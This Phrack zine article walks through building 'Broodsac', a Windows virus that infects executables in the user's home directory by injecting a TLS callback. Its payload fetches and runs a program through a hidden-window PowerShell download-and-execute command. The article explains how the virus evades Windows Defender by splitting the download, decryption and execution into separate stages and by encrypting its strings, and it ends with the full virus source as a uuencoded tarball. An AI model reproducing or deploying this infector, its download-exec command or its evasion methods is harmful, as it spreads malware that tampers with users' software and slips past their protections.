==Phrack Inc.== Volume 0x10, Issue 0x47, Phile #0x09 of 0x11 |=-----------------------------------------------------------------------=| |=--------------------------=[ Broodsac ]=-------------------------------=| |=-----=[ A VX Adventure in Build Systems and Oldschool Techniques ]=----=| |=-----------------------------------------------------------------------=| |=--------=[ Amethyst Basilisk ]=----------=| |=-----------------------------------------------------------------------=| --[ Table of Contents 1. Introduction 2. Planning the Virus 3. Designing the Virus 4. Building the Virus 5. Dealing with Development Hazards 5.1. The Original Design Fails 5.2. Antivirus Catches It 6. Conclusions 7. Shouts 8. References 9. Artifacts --[ 1. Introduction There is nothing more thrilling than a successful payload. But in the pursuit of payloads, we are susceptible to dopamine addiction. And in that addiction, we seek shortcuts to get our hit. Indeed, the urgence of speed requires us to hunt these shortcuts as well. Just use bash glue. Don't worry about code maintainability. I have the compiler, why make things more complicated? It is easy to forget when pursuing our dark arts-- from viral writing to exploitation-- that in everything we do, we are creating software. And software gets complicated. Certainly, for shellcoding, it is merely a one- liner with NASM to create a binary blob of your creation. That's not complicated at all. But isn't the shellcode going somewhere? C won't let you simply merge binary blobs into your code. (Not until C23, anyway.) And it's not always as easy as concatenating your creation onto your executable. What if you want to encrypt the shellcode somehow? And what if another program has to handle that shellcode? And that program might be the payload of another program in the chain! This doesn't even begin to consider what automation your assembly payload might require, such as dynamic obfuscation. Our dark arts are a mess of project management-- payload factories, matryoshka obfuscation, a plethora of moving parts necessitating cleverness. It is not to say our quick hacks are not worthy of their purpose-- they are. But they are more often than not optimized for speed, not interoperability, maintainability or portability. A good build system, by sometimes sacrificing short-term speed of development, provides these things. Unix users are already familiar with this. One of the oldest build systems, GNU Make and the autotools suite, is fundamental to sharing and building code on Unix-like platforms. Windows users, however, don't have this culture. Everything is Visual Studio projects. And like everything Windows, the MSVC build system is a veritable black box behind the Visual Studio IDE. The hackers who can wield MSVC's black magic to their whim have undoubtedly inspired us with their mindblowingly assembled payloads. Lord knows I would love to see SmokeLoader's build system[10]. You can think of this article as a cooking recipe. While the virus technique used here is nowhere near novel ("roy g biv already did it"), it is wrapped in techniques and best practices to build any type of virus. We will cover the use of a robust build system to construct our virus and discuss techniques for build systems that bolster our malware development. We will also be covering some techniques necessary to circumvent Windows Defender, as this is now the baseline we must develop against. To follow along, grab a copy of Visual Studio with C++ support, CMake (https://cmake.org) and NASM for Windows (https://nasm.us). To fully understand this article, you are expected to have a basic understanding of PE files. --[ 2. Planning the Virus We want to write an executable infector for Windows. To do that, we need to break down the moving pieces involved in an executable infector. While traditional executable infectors have gone out of style due to advances in executable security, it can still be done-- especially in the advent of developers not being able to afford or care for signing their binaries. (Hello, Rust!) At the outset in the abstract, we have two pieces: the *infector* and the *infection*. The *infector* is obviously responsible for infecting executables it finds. The *infection* is simply whatever payload we want to inject into various executables. Already, we have a dependency to work with: naturally, the *infector* relies on the *infection* in the build system, somehow. We want the infection to be flexible and portable so it's as easy as possible to inject into executables. Shellcoding fits this purpose perfectly. For writing quality shellcode, we stick with the C-then-ASM philosophy of writing our payload. In Broodsac, we have opted to let the compiler's optimizer optimize our C code and hand-translated that into an assembly file. While this can be tedious the larger the shellcode gets, we luckily don't have to worry about traditional requirements of shellcode as it comes to exploitation, since we're targeting an executable, not an exploitable buffer. Therefore, we have relatively fewer limits. Additionally, because Windows has support for both 32-bit and 64-bit binaries, and being the dinosaur it is, 32-bit architecture is still relevant. So payloads for both architectures will be necessary. At the outset of our plan, our virus hierarchy looks like this: + broodsac + infection + ASM + 32 + 64 + C The infection is purely a necessity of the infector, and as such, should be contained within its directory as a dependency. We should provide ourselves some external ability to compile the assembly payloads into their own binary for testing purposes. This means, in the abstract, we have roughly four binaries to work with-- the infector, the 32-bit ASM, the 64-bit ASM, and the C payload. Our infector should merely only rely on the assembly payloads, so we know we should somehow connect these pieces at the outset to our infector build. Having the projects individually separated this way makes the moving pieces easier to manage. Disaster, so to speak, is relatively contained to the individual units, organized and in their place. From the outside-- especially when accustomed to a hack-fast lifestyle-- you would not be blamed for seeing this organization as mere masturbation. Again, why bother when I can just stick everything in the same folder and issue compilation commands where I deem fit? Demons lurk in your code. That's why. They will snap out and pull you under when you least expect it, splashing red on your screen, spewing Stoustrup's nightmare inheritance, demanding refactoring for your sinful C. Being organized and compartmentalized in your endeavors gives you the territorial high ground in the battle of bugs. Being prepared for something to go wrong turns these demons into mere irritants. Constructing a build system around your virus exposes the pain-points when and where things go wrong, allowing you to quickly and elegantly attend to the problem. It also acts as a functional, engineerable glue to wrap around your build. The more complex your virus gets, the more a solid build system becomes essential, freeing us from the chains of uncreative compiler corporations. --[ 3. Designing the Virus We now have the abstract design of all the pieces of our virus. Next we need to fill in the blanks! We have two questions we need to answer: + How should our virus infect the executable? + What should our viral payload do? The first question was answered initially-- naively-- with code caves and PE file entrypoint redirection. Entrypoint redirection is a technique as old as EXE infections[1]. Unfortunately, code caves in executables aren't frequently in a size capable of handling the beast that is Windows shellcode. On average, you get around 200 bytes. Suitable for a Linux shellcode, not very good for a Windows shellcode. After some thinking, TLS directory injection[2] was settled upon. The TLS directory-- or Thread Local Storage-- is one of many directories within a PE file. It is responsible for ultimately managing thread memory storage tactics within the given executable. A notable trait of the TLS directory is initialization callbacks. There can be many, and they're iteratively called on process startup. In other words, the TLS directory takes precedence over the main routine, as the TLS directory initialization is part of the PE loading process. Remember this last part-- it will bite us in the ass later. There is a matter of how our TLS section gets inserted into the binary. We have simply opted to insert a new section, as we can provide a guarantee that the section will be executable and writable, as opposed to containing other metadata such as program resources. If we wanted to be stealthier about the infection, we could control for executable sections and apply the 29A technique[3] of expanding the last section in the executable. Naturally, the trade-off for stealth here will be to reduce potential attack surface and-- perhaps intentionally-- increasing complexity of detecting the infection. The power is yours. We want executable targets. Where do we find them? Surprisingly, in the user's home directory. Gone are the days of every program installing itself in the Program Files directory, now is the dawn of AppData and the user's document folder where they unzip various packages of unsigned executables. We can simply recursively iterate the user's home directory for targets. As for what it should do on infection? I'm a particular fan of the Desktop Pet project[4], formerly known as eSheep in the 90s. An appropriate payload to send up an infection technique from the 90s. It provides a great visual if the payload executes for testing purposes. Our payload should simply download (if the file doesn't exist) and execute this cute little sheep onto the user's desktop. Who would oppose such adorable software augmenting executables with a delightful animal friend? A simple download-exec of this payload will be perfect. --[ 4. Building the Virus Quick and dirty, to build Broodsac, uudecode the artifacts in section 9 to get the tarball, extract it, and run the following: $ cd broodsac $ mkdir build $ cd build $ cmake ../ -A x64 $ cmake --build ./ --config Release Naturally, I am assuming you won't be foolish enough to run the result on a system you don't want tampered with. Unless you *want* sheep friends in your executables, then by all means. While you are building your virus, you are undoubtedly going to encounter bugs. Considering we are building software, we should borrow from software's philosophy of creating and performing tests. These do not have to be formal unit tests, per se, where functionality is verified at individual code points, but they should somehow test the functionality of your virus. Considering the volatility of the undefined behavior of targets we work with in our dark development, you should absolutely build with tests in mind at the forefront. There are three key questions we need to consider for our testing purposes: + Does the payload work? + Does the infector successfully infect? + Does the infection succeed without disrupting original execution? The first question has an actionable task for us: how do we test this? Naturally, we don't have to do it programatically-- we simply need to run the payload in its many forms to see if it successfully launches a cute little sheep. C and Assembly have various development pitfalls that will become apparent during this simple testing process. To build and test our 64-bit payload, for example, we can simply do this: $ cd infection/asm/64 $ mkdir build $ cd build $ cmake ../ -DINFECTION_STANDALONE=ON -A x64 $ cmake --build ./ --config Release $ ./Release/infection_asm_64.exe If our payload succeeds, we are rewarded with a cute little sheep. A simple test. This is similar to the configure/make process on Linux. CMake takes the CMakeLists.txt in the target directory and builds the configuration for your compilation tools necessary in order to perform a build. We have configured our ASM files to be compileable as either standalone binaries for individual testing, or as static libraries to be included with the infector binary. A static library was chosen as the method of merging our payloads into our binary because it's simple and elegant, since the payload's architecture will match. Instinctively, we see shellcode as a unit to be stored away, to be converted to a hex string and stashed away in some C code. So we wind up doing creative things with it, as to us, it is merely a blob of data to be wrangled into something. We tend to forget that the shellcode can be its own individual code unit. But with a build system on your side, you can augment the way your shellcode comes out at the compilation stage. After doing various build customizations to our shellcode payload, in our infector binary's CMake file, we include this and the 32-bit version this way: add_subdirectory(${PROJECT_SOURCE_DIR}/infection/asm/32) add_subdirectory(${PROJECT_SOURCE_DIR}/infection/asm/64) add_executable(broodsac WIN32 main.c) target_link_libraries(broodsac infection_asm_32 infection_asm_64) In a rather clean way, with a simple set of "extern" keywords in the infector's main.c file, we have included our shellcode payloads into the main binary. While not shown yet, in addition to this process, we have managed to automate a step of encrypting the strings within the payload code, so every time our build is executed, the strings are re-encrypted and re-assembled in the infector executable. We have avoided the tedium of manually converting our shellcode into an array of some kind and even added an obfuscation step along the way. The beauty of this method is that it avoids the unseen hazards that tend to spring up from the speedy solutions we're used to. And at the end of the day: it's just good software development practice. Let's get back to our questions. The other questions, while having the same action item, have a more complicated answer. We need to test and analyze the infected executables to verify and debug infections. So we need to enumerate what we need to test based on our design intent. Because we're dealing with the TLS directory, we are dealing primarily with *virtual addresses*, as opposed to RVA and offsets. Virtual addresses tend to imply the need for relocations within the binary. This is absolutely something we need to deal with as an executable infector-- with the ubiquity of Address Space Layout Randomization (aka /DYNAMICBASE), we would be stupid to not consider modifying the relocation directory of a target executable in the case of infection. Thus, we have four states of configuration to test infection against: + no tls directory present, no relocation directory present + no tls directory present, relocation directory present + tls directory present, no relocation directory present + tls directory present, relocation directory present In addition to this, we need to consider targeting the 32-bit architecture as well, creating a total of 8 binary configurations to test against! This brings the total code projects in our virus project to 12. With a good build system, we can construct all these test binaries rather easily: $ cd infectables $ mkdir build32 build64 $ cd build32 $ cmake ../ -A Win32 $ cd ../build64 $ cmake ../ -A x64 The build scripts can basically follow a folder hierarchy and build multiple projects contained within, which is what's happening here. We now have two configured build environments-- one for 32-bit and one for 64-bit. $ cd build32 $ cmake --build ./ --config Release $ cd ../build64 $ cmake --build ./ --config Release This will place all the binaries in the Release directory within the build environment. They can then be targeted for infection by our infector executable for testing purposes. Like the compiler at the command line, we can configure various switches to define CMake headers. We can configure our infector to be aware of a directory containing our infectable executables: $ mkdir build $ cd build $ cmake -DBROODSAC_DEBUG=ON -DBROODSAC_INFECTABLES="infectables" \ -A x64 ../ This command effectively builds Broodsac in debug mode. Rather than targeting the user's home directory, it will instead target the infectable directory, where our test programs are currently built. By running Broodsac in this state, we can easily verify the state of infection and its corresponding payload. And this is of utmost importance-- the demons that hit the hardest, lurk the lowest. Robust testing will help to eradicate them. --[ 5. Dealing with Development Hazards The result of the virus you see here is a labor of love, of many hours spent debugging, testing, verifying, fixing and refactoring. But when you see the final product, what you don't see are those little steps along the way that ultimately built the product before you. So it's hard to appreciate the struggle, the fight that comes with software development. It is, for the most part, an individual journey that everyone who writes code wanders on. It is very easy to laugh at a good, terrible bug. It amazes us when stupid bugs seem to have a persistent lifetime, just waiting to be discovered by the next lucky actor. But bugs are part of the life-cycle of software, whether exploitable or not, and as you cannot escape the gravitational pull of software development as a virus writer, you may as well embrace its best practices. This section focuses on two pivotal points of critical failure in the process of developing this virus: a point when an initial payload idea failed at the last minute, and the point when antivirus seemed to start detecting our infections. --[ 5.1 The Original Design Fails Do you remember when I said the TLS directory would come back to bite us in the ass? How did having a robust build system help us with that? Originally, our payload was a very simple, sensible program: import GetFileAttributes, URLDownloadToFileA and ShellExecuteA. This would essentially be all we needed to download our sheep and run it on the target system. To help explain the chaos we mitigated, let's break down the steps we need to generate and test our final payload, the infector: 1. compile the C infection 2. test the C infection 3. translate to assembly on 32-bit and 64-bit architectures 4. compile the assembly (2x) 5. test the assembly (2x) 6. incorporate the shellcode into our infector 7. compile the infector 8. test the infector 9. verify the infections succeed When we fully enumerate the steps needed to build a sound virus, we can appreciate the simplification a build system provides a complex ecosystem. Because at any given step in this process, something can fail. At any given point in the process, if there *is* failure, we will have to restart at a certain point. The more time it takes to resume where we failed, the more time that is wasted. And not being clear from an organizational standpoint where you need to go to restart is a time waster. A good build system saves you time, a very precious resource. In this case, it was discovered that ShellExecuteA and URLDownloadToFileA were failing all the way at step 9. Ass status: bitten. And look at when it chose to bite us-- testing, rather than deployment. Why was it bitten? Our infection technique of TLS injection. Due to choosing to perform TLS injection on the binary, we were tempted by the fact that we got precedence over the entrypoint of the infected executable. But this means we're currently executing in the context of the executable loader. This means our infected executable is not yet fully loaded. In particular to our conundrum, *threads* are not yet fully initialized. It was observed when ShellExecuteA and URLDownloadToFileA were executed within the context of a TLS directory callback, they would hang. It was noted, too, that the process attempted to create a thread before it hung. This likely meant we could not use any functions which wound up spawning threads. The payload was changed to something slightly less conventional: CreateProcessA. While not unconventional for our payload program, the way we eventually went about downloading the payload certainly was. CreateProcessA eventually calls NtCreateProcess, a function of ntdll.dll which ultimately culminates in a kernel syscall. This would undoubtedly be thread-safe in our TLS directory. So how did we eventually download our payload? A call to Powershell. Certainly goofy for a shellcode payload to make an external call to Powershell when the API is at your fingertips, isn't it? So is the nature of hacking-- when faced with a challenge, we heed the call with non- standard solutions, in spite of our opinions, when it simply works. Nonetheless, this solution required a significant rewrite of the code. The C payload would need to be rewritten, recompiled, translated into assembly, those assembly files compiled, and stuck back into our infector. Essentially, we are forced to go back to the beginning of our steps enumerated and work our way back to our infector. That's a lot of time, and even more steps to take without the simplification provided by a build system! But with everything glued together, the only time we are wasting is simply the equivalent of raking the sand in our zen garden: coding and analyzing. All because our build system makes our complicated abstract verification steps relatively mindless: $ cd infection/c/build $ cmake --build ./ $ ./Debug/infection_c.exe # any sheep? try again $ cmake --build ./ --config Release # for translating to asm $ cd ../../asm/32/build $ cmake --build ./ $ ./Debug/infection_asm_32.exe # any sheep? try again $ cd ../../64/build $ cmake --build ./ $ ./Debug/infection_asm_64.exe # any sheep? try again $ cd ../../../../build # footgun: are you debug configured? $ cmake --build ./ $ ./Debug/broodsac.exe # at least you just get sheep if you footgun Every step where something could functionally go wrong is isolated into its own place, manageable in their own regards. Each action we need to create our virus, from payload to delivery, is instrumented and flows smoothly between one another. When something goes wrong at any point in this chain, we know exactly where to restart, and can quickly act and tackle the issue. It's one thing to be agile when it comes to mitigating the demons of bugs, though, but what of the demons of emergency feature requests? It is not merely a push of management that inspires such spikes in development, but of surprise necessity. --[ 5.2 Antivirus Catches It It was incredibly amusing to me when I noticed the sheep being detected as malware. Curious, because the sheep itself was technically benign-- the infector and the infection were actually the malware. Initially, I whitelisted it in Windows Defender while I was working and didn't really think anything of it, I'll fix it later. Eventually, I had to face the music and figure out why my virus was being detected, even if the sheep was curiously benign. The hints we were receiving from Windows Defender was that it was some kind of script that triggered it, and that the signature it was hitting on was called "Trojan-Script/Wacatac.B!ml." Some research on the signature told us absolutely nothing, as procedurally generated signatures are wont to do. It did manage to tell us that everyone is pissed that all sorts of random benign executables were being flagged as Wacatac. We're being taken down by a false positive? Positively embarrassing. Anyway, it seemed clear that with the script hint that it was triggering on our Powershell one-liner. I didn't even bother to obfuscate the command in any way whatsoever, so it's no wonder it got caught in the end. We later confirmed thanks to some Windows Defender signature research[5] that our download string was absolutely in there, somewhere, so surely this was the culprit. This means, now, we would have to obfuscate it. Sure, we could just do it one-and-done and hardcode it into the assembly files, but where's the fun in that? They'll just flag the encrypted blob and call it a day! Where's the flexibility in that? And what if I need to change the eventual command entirely? How can I make this as painless as possible for me and others who want to transform this code? The beauty of a good build system is an ability to humbly offload build commands to another process at specific points in the build. Let's look at the code in our payloads which encrypts the strings: add_custom_command(TARGET infection_asm_64 PRE_BUILD COMMAND powershell ARGS -ExecutionPolicy bypass -File "${CMAKE_CURRENT_SOURCE_DIR}/../strings.ps1" -payload_program "\\??\\C:\\ProgramData\\sheep.exe" -payload_command "sheep" -download_program "\\??\\C:\\Windows\\System32\\WindowsPowerShell\ \\v1.0\\powershell.exe" -download_command "powershell -ExecutionPolicy bypass \ -WindowStyle hidden \ -Command \"(New-Object System.Net.WebClient).DownloadFile(\ 'https://amethyst.systems/sheep.dat', 'C:\\ProgramData\\sheep.exe')\"" -output "${CMAKE_CURRENT_BINARY_DIR}/$/infection_strings.asm" VERBATIM) Powershell was chosen simply because it's easier to work with than the oldschool CMD. A simple script was created which transformed the many strings we needed to encrypt, chooses a random key, then does the traditional xor-encrypt on the string. The script produces a NASM include file and dumps it into the binary directory of the build system-- essentially the catch-all directory for any generated artifacts. We then include that directory in the assembler directives so our assembly files can see it: target_include_directories(infection_asm_64 PUBLIC "${CMAKE_CURRENT_SOURCE_DIR}" "${CMAKE_CURRENT_BINARY_DIR}/$") As creatives whose canvas is questionable machine code, we can no doubt see the attractiveness and capability that this brings. If you're really feeling saucy, you can even mutate COFF objects and incorporate them with specific library configurations via CMake as well! Mucking around with object files directly would look something like this: add_library(obfuscateme STATIC obfu.c) add_custom_command(TARGET obfuscateme PRE_LINK COMMAND obfuscate ARGS "${CMAKE_CURRENT_BINARY_DIR}/obfuscateme.dir/$/obfu.obj") add_executable(virus main.c) target_link_libraries(virus obfuscateme) What these simple four lines wind up doing is compiling a set of functionality that needs to be obfuscated, calling the obfuscator on our compiled object file, which is then reincorporated into our build process at the linking stage, then adding the obfuscated code as a library dependency of the main virus. Whenever the virus target is called to be compiled, the functionality will be obfuscated and incorporated into our code automatically. Fundamentally, if you can call an external command to generate anything as part of your build process, the sky's the limit with what you can incorporate into your program. As exciting as the implications of these particular capabilities are, our thought to mask the signatures we thought we were hitting on was not sufficient. See, as the Defender signature research[5] demonstrates, there are multiple types of signatures to deal with, and according to DefenderCheck[6] and the slightly more advanced ThreatCheck[7], I was not hitting on static signatures. Indeed, digging into the guts of the threat names in the defender signature database proved relatively fruitless for hints on how to evade-- there was a static signature algorithm that wasn't quite coherent on how it was being scanned and, more importantly, a thing called a "NID." A NID, in this case, appears to identify something within the Network Realtime Inspection Service.[8] Probably some sort of metadata information about certain behavior. This means our signatures were likely triggering on a behavioral signature! How could we get around this? Naively, having not run into this before, we threw random shit at the wall to see if it worked. Hell's Gate? The Network Realtime Inspection Service wasn't exactly an EDR, so naturally, it didn't work. Not to mention, with Microsoft's unique position on the Windows landscape (they are the dungeon master), attempting to evade EDR just isn't nearly deep enough. But for the sake of completeness of potential evasions, it was left in Broodsac's payload. (The Hell's Gate implementation consists of direct syscalls, not indirect syscalls, so it still could use some work.) Fundamentally, a behavioral signature relies on chaining certain actions together to declare something as potentially nasty. Let's step through what our payload essentially does that could get flagged as potentially malicious: + download an executable + perhaps decrypt the executable + execute the executable Frankly I see nothing wrong with this, but apparently Microsoft disagrees! A funny quirk about behavioral analysis, though, is that it relies on identifying the behavior of a given execution context, not the sum of its executions. In order for behavioral analysis to succeed, the bad behaviors which happen in combination need to happen within the same execution context. If we split the three tasks above into three separate execution contexts-- download, decrypt and execute-- will this be sufficient to bypass the behavioral detection? Yes! While I did not reverse-engineer NisSrv.exe to see the why's of why I evaded, the theory of splitting up tasks across execution contexts succeeded in bypassing Defender. The payload thus evolved into an interesting multistage payload. The user would have to run the infected executable multiple times before a sheep would appear. This would have the added benefit of confusing stealth. Where is the sheep coming from? Why does it keep happening when I run this program? Baffling! But adorable. In this way, Broodsac lives up to the name of the multi-staged worm it was named after, the green-banded broodsac.[9] Our zen garden is tended, and ready to be shared, for others to meditate upon and ponder for their own gardens. For that meditation, the various code objects contained in the tarball attached to this article have been annotated with comments to explain the individual code areas and what they're doing. Naturally, the complexity of the dinosaur that is the PE format comes with annoying, disgusting tricks and habits that make one ashamed of their code in the first place. I apologize on Mark Zbikowski's behalf. --[ 6. Conclusions It is without a doubt that the strange developmental anomalies you see within wild samples of malware are the byproduct of some sort of build system. SmokeLoader's use of encrypted functions is certainly not a feature of the MSVC compiler[10]. But even a nasty rewrite of a C-file being dumped into a directory for an IDE to compile, while quick and dirty as we hackers love to do, would technically count as a build system. After all, the Visual Studio IDE is merely a shell for the build system that is MSVC. But as virus writers, we are still technically engineers at the end of the day. We long for the beautiful solution to the problem. We ultimately want our own little zen garden to tend to. The beauty of CMake in particular is in the fact that it's cross-platform. So if you have code-- for example, an obfuscation engine-- that is capable of being used on multiple platforms, CMake can be used to make building the project on each platform relatively painless. Just like how CMake wrangles MSVC, it can also wrangle the complex build environment that is GNU Make. Many other build targets are supported-- but some not as fully as MSVC and GNU. Exotic targets may have some difficulty. I hope I have made a good argument for incorporating build systems into your payload development. While we can certainly get by with surface shell scripts, wouldn't it be wonderful to get into the guts of the machine at the linker level? Linux developers have that privilege, why not liberate that access on Windows? After all, we're all effectively the demons of our target operating systems-- we lurk at the lowest level of the machine, and we love it here. --[ 7. Shouts 0x6d6e647a for editing, dc949 for being family, slop pit for memes and hardchats. --[ 8. References [1]: 40Hex #8: An Introduction to Nonoverwriting Virii, Part II: EXE Infectors, https://amethyst.systems/zines/40hex8/40HEX-8.007.txt [2]: 29A #6: W32.Shrug, by roy g biv, https://amethyst.systems/zines/29a6/29A-6.615.txt [3]: 29A #2: PE infection under Win32, https://amethyst.systems/zines/29a2/29A-2.3_1.txt [4]: https://github.com/Adrianotiger/desktopPet [5]: https://github.com/commial/experiments/tree/master/windows-defender /VDM [6]: https://github.com/matterpreter/DefenderCheck [7]: https://github.com/rasta-mouse/ThreatCheck [8]: https://techcommunity.microsoft.com/t5 /security-compliance-and-identity /enhancements-to-behavior-monitoring-and-network-inspection /ba-p/247706 [9]: https://en.wikipedia.org/wiki/Leucochloridium_paradoxum [10]: https://www.sentinelone.com/blog /going-deep-a-guide-to-reversing-smoke-loader-malware/, see "Decoding the Buffer" --[ 9. Artifacts begin 644 broodsac.tar.gz M'XL(`````````^P]:W?;-K+][%^!9KNI9$N.93O>['7L2H0L-A2I)2D[WC;__<[@10"D'G;<;;MK?6@L<#`8S`SF";&C.(J\Q!V_ M:ERZGVC'3])D-_VXK^UO[S>T__%3^WUT>MO:H>O_[)_N'^X M]_KH&QC9.]C_ANP]*15+/HLD=6-"OIDOXGE`E\.M>_X'_8QG('9GYH?^;#%S M8OJ/A1]3K_2NU1^T>UURL%M[7=[:FL?13W273A?^4]Y*:%IJ M7-;_I^5<#MXUG/YU=]B^;#F=]EF_WO^1O+AMQK!^UFD-R(L7I%%O7+3(8-AO=P'=@*8DG5)` M$G@T-G"1-")^.(&-5F#!X)[$-*"W;IB2.S^=$I,P('C+]3PG68P\8-DXC>+[ MTG<_7_5[_PV+.X/>=;_18L0KBYS-YV6ZF>#7N=ZV'*NZL,+4LC\;J]_6>^T_[=E3>W6A^UWJR86 M#2*.)(U!`4K]UE6GWFB1%W__^PO\#_Y3+/WO?BX:__("D0DFC:/9W`^HX]$) MG`)D@L:IJ^NS3KL!P,02OSFDX3Y9L28-/7]2*F_]UH=>^\B=ON*J\ZNLL=+^ MU_9?'[S6[/]^#>S_P0&X@6?[_R_X_,D/Q\'"H^1MDGI^F.Y.3[?,L<@=CG/5.G,ZS;[3K`_K6S\C!=>='GB5#@UOTNDQ#ISU>IU6O4O::$O< MP/\G]=CX1;W;[(`;2BZ`OH"RL4Y[,'1:W2%XR7;8B5RO%P-EEY&W"%@HE@>Z MI#-P%VO!U.(NVK,B\*MWO7:3M,(TOF^'5W%T`_Q+C`T,IHL4)!U:C^4^Q%/N MU]NPQR]Y%E7(]E5N\'BKD+7RLL^6(P.-\$02`K^O.E@#@ M2A8`PWP>N#>2K/>]?I,@`QK10A'`!H=!T@X]^EF,+4+8%?]3\-!FP86;3/4= MLP\7B#:@3]:8,.#1`F,#C8]M($YX8TK'GP:+F?[XB_CR936=','0G]$FV(I! MZL[F.A9.!/*!>NW9/(K3Q,)KRZH.]-XR43EXV@XA%IPQF+S" MG$?QG;M"H08TOO7'=.C>+`-(`?-8//RR7.75D2EZF#\ZCG/EW@?`"."3RUFX M@.T>[#LI24`EC^7(&QCP`.9#[2.NK\T"I,`/L-[Z()GSOP_VCU<\/3K4*+J- M?(]LD](V1*%!$(TOF)DMEY`,)RT?%P""Z=`A^8,**9X!\).84A-8`QJ#R>=H M@3?AV$TE)'^`+B!,4B*_Y18!)LG)_G@V5[.-66MP\`&!)J!A$9)"3LSH;#R_ MMQG!IZUFBYP.&9`]'7:T?)^XHKW+#=>]N.PUK\$'`!8\@QV68-S7):[.50-, MF@;?9!8*H'^@Z9#.YG#%<2A]9?K<&#$S*"T6>A9 M<5(?('%6?@9:(XTT]4JJ583N?>SSK>;Q-1Z%L!%$">5ABHFRD-7G M$!">^W&2%G*[<\4R4^>\W6TR>U8O6!!1=,',&!BR7:S`<-%O#:X[0U)R'(A5 MQV!.R/;@`J7"TGO4M`SA^VY3'`J)V]*]O'5ML\0XBMOU(0]&()"=);?C.,40 M$;[KMDY\83;7,&WR&WN2&3'V)QLS+);\IIYDYDA]E<^4C1%?V+AN3,07.:ZL MA/BBX-4*_`OP@F_V$YA^&ASLB^WFSSL)LB&&K4@?R$0?5&"6S!F4'&-`N6-, MQFJ$`>3.'[G)1AB$>=A0$IZ:;9T<_\\7M8T#&V8AB4#*E0<:?8MUC1*E! M]+^:7AVS[`A+4HUW;(Q,%B$+KR`\3>_)/(YN?0\2)I>,W,0?DT8U2>\ARW M&O7!L)16:)F42FFY1,ME];#QKM48]OH.`[FMI.4,O'1;KIXB.7GHLQ_!&\!S MP(=`:F_H=7%`[JO,J&=G'+03Z)2BY-+`\B6*"#+/.5(LGXZYS!PVL:3I!-GV M7>6[,Y96;'Z6.>LE/DC2%D$J[`_^N9M1?$+V]`<2@SV.?("Q+H2@7,6Q#JAA M`?"RB,1!5;`T*Q==LJJF#Q)=MO9&V#12#3TR*0:&54^Y`2Z9XGO)`-7TC!4R%Z%K)IGT?>%21P-N'ETXVAFB)HINY0S@A>(64[>YF!"J,@I<:9/ MN$#(+[^(4\[U58Z;+!1\UK:ISRG8IUA58P^C4Y_%GYEK"QW1QDV=XAP2GJ_P M5-CL$;#K.;3L'.199K,&_BS40F2M/F!OB>&1&:HA3D:?8.%Q?K4O6YH9!!?@ M:$RR%UG&S,+GNMI+QIF"7B9ER0"#FK?$V*JE0:;U%#*0:>5V>4>MK%M('7^9 MZ5W&\ZKY%*!S&,I2A?PPH3&6]22)&,-%_-A5A;A=WM2Y\6]I"(\]^IGU;'C1 M4+I&6]\XX@>H&T-<$0Y,$+/RM$J"5QU4F,@)/LW+_N7+_-BW.:.9(5IJ':3J M;DL:+=^C:;$F@@JI*9V6Z@#!I*5G@K*"^XH\2+BHV+X";ES[UG!-Z:W*!`O8O%$&(%ZR+C]%;/F/RT@]66-0*9U/*S# ML!VX5I)Z<%([)OY;FX(JH^V8[.SX4D!:44O,3>*QP_>0WT+5K]:.@D+`*"(;F0.7W2`UYU?16FYG%L$:'J:1=3FC$5T90.("M*R2K^^9)JE M3WT,09R8-5HM?=LLNJ6Z85+N7UF0G(O#*0\U.2MMC#`>2P[$4FM3<(*J-=OV M?R43[;HP(8_2$4XQ6(%"C(4SBH\F;+"L8H`'F:!J34E]ODBFNLR%ZZ&A)S.Q M9<+'F9N(_DG]B^7L5NY2:?TF*@Y_P-BN?LJ.M^F?K`C:S!NCS-(E=HGX>W!?LTUZKS\KH+8B(*J!Y6Y&[ M""A&NJ@-8F7"F4T>P/GHE5OMOIDQOJ'%7,G9544 M8T?@,[9BB+K5@LKADJL6F>#.(&4'[OMPV.ZQP)RZH)&H6-P<`6CHSJC'-K2M MZA.)+']X9,3ZMZ39Z>SB'S$E/M9$)SU48^3.&(EL:OV2( M@+PXI@'K4HM`4X<4*+652.E3&-T!ZH0!1['GAR`-]@Q<"4AV/,WJ.!D^&<=: MFU94,":A,D2+6%Q744`2K<^8&-^ZQ/4\[-(2`Z)M+PC(`F0=8/B%13UX`I$KIZ5" M6-!UYR?`AE2@Y!J:D'`1!+LBZ&*'D&DC5\;N4.CB@&R'J2/;^"H,609;,0&4 MMZEPE2[O\'_!##K!Q`WI'?<1.KK6WZYZ_2%>RF+>ZT>P4TS7G4S7%1DR25PY M73JR-91EVZR>]N:\8,=+BKO8AVO*U3^(XRH7X.U"L>['W7=^G"[(^^7;/)6KA35CZH&RG?[*'"41^?G3P MX9**0:1S4T#"L5W9UN1@GQ29G@*XBA'IZMY3A+I%SW-NMVQ;)9$69$3(.BO^ M$TUX-[6\([YQ=.?M3DOB,TQ*UOK8Y?=73!O#%N0H!D!KN]>5P[Z;-VLQN/ITYRYZ?CJ1:;,]T;W0-5PHJ< MK--3KF'J_M+/INIGEN#H$`XK7I19\IQ9%+QF@^+0SK5J,-Z("^O=H;JYB'RF M+@1_N!D1+:%^&GOCZV4(=Y&,%2;KZ+"B,>"1YHD&"2U:&7:YTEA^_$)T*G=.R!NIA)H<*5%AR(!'MLYH,WS/3HP%4UAT0+20IH"^3M:S;&"OJ31JM M![!6F?0]ZP5Q@Q<[*MI3^RF$A2=9B>B+4B*I:YM*^V!_$VDCU+]>VBR;6B%L M_OS?1M:XG8U%+8R%1R'LF^&M%C0%@0OIF!;""0L1Q?X-JUGEHCMN+41BA`\% M4[+2ZS(KHD.#5,S4*]N#\/#9P#HCLDGEXZP^:/5;G5ZCJ/A!9/VC\#@\"=D% MI^&)R=;24YSEL&EUC(OQFAC5(NM?>G;+QN5:0NM?2R-<_!0$K0C MR^L$-H;R3FYYGK*>P<"GL@K-A&MTT8#HRCQ",$.9V8C,GK63F=TWVI9'CX4; MF%3IX0<\WE]^")Y>CW&[:`XRNM=$W+_2@EMY\>94P8H^#<,G:FOE#WL?R4NR M]_DX5UQ\*E$QS.)KVAT3^.E??IKK+ M(*VU,QB*LE%^X>+3N_] M`VD\>"(2S9LHV64N'0WO\ZG[FKQP<;`_\E-6OA!1Q).4+KZR&D&^KEKY]0GX M[[LR65R2_)I=VW7'+'66G-#"S.P*KC!;(PKQ%E:RB3"V')XL)E^7P MFC;8=0V\=X>JJW>NU$W.XBE(@#$E,[X3K14;X-WZ>SC6QB;$3V_]5,L[O[*M 